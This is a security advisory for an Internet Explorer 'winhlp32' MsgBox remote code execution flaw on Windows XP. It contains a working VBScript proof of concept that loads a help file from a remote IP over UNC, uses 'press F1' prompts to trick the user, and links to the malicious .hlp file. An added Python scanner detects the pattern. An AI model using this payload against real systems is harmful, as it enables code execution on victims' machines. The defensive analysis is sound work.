Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability
Source: vfocus.net  Author: Prodeus  Published: 2010-03-03

Microsoft Internet Explorer is prone to a remote code execution vulnerability.

Source (iSEC Security Research):
http://isec.pl/vulnerabilities10.html

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.

Note: attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.

Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.

===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================

<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
 
//For i=1 to 2500
//  big = big & "\..\"
//Next
 
 
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>
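
For defenders, the pattern above can be detected statically: the fourth argument of VBScript's MsgBox is the help file opened when F1 is pressed, and here it resolves to a UNC path. The following scanner is an added example, not part of the original advisory; the function names and the sample host fileserver.example are assumptions constructed for illustration.

```python
import re

# Only <script> blocks whose attributes mention vbscript are inspected.
SCRIPT_RE = re.compile(r"<script\b[^>]*vbscript[^>]*>(.*?)</script>", re.I | re.S)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')    # name = "literal"
MSGBOX_RE = re.compile(r"\bMsgBox\b\s*\(?(.*)$", re.I)

# Constructed sample input (not taken from the advisory).
SAMPLE = r'''<html><script type="text/vbscript">
hf = "\\fileserver.example\share\sample.hlp"
MsgBox "press F1 for help", ,"title",
hf, 1
MsgBox "local help", 0, "title", "C:\app\help.hlp", 1
MsgBox "no help file", 0, "title"
</script></html>'''

def split_args(text):
    """Split an argument list on commas that sit outside string literals."""
    args, cur, in_str = [], [], False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        if ch == "," and not in_str:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    args.append("".join(cur).strip())
    return args

def find_remote_helpfiles(html):
    """Return (statement, helpfile) for MsgBox calls whose help file is a UNC path."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        body = re.sub(r",[ \t]*\r?\n[ \t]*", ", ", body)  # rejoin wrapped calls
        variables = {}  # VBScript names are case-insensitive
        for line in body.splitlines():
            m = ASSIGN_RE.match(line)
            if m:
                variables[m.group(1).lower()] = m.group(2)
                continue
            m = MSGBOX_RE.search(line)
            if not m or line.lstrip().startswith("'"):
                continue
            args = split_args(m.group(1))
            # MsgBox(prompt, buttons, title, helpfile, context): helpfile is index 3
            raw = args[3].rstrip(")").strip() if len(args) > 3 else ""
            value = raw[1:-1] if raw.startswith('"') else variables.get(raw.lower())
            if value and value.startswith("\\\\"):
                findings.append((line.strip(), value))
    return findings
```

Only string-literal help file values and variables assigned a single literal are resolved; a help file path built by concatenation is not flagged by this check.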


 